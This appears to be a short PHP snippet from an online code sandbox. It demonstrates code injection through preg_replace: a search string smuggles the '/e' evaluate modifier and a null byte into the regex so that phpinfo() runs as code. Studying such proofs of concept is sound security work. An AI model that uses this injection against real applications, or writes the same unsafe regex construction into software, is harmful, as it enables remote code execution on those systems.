<?php $search = "phpinfo();#||/e\00apple"; if (strpos($search, 'apple') !== false){ echo preg_replace("/".$search."/", $search." <img src='".$search.".png'>", "apple"); } ?>
You have javascript disabled. You will not be able to edit any code.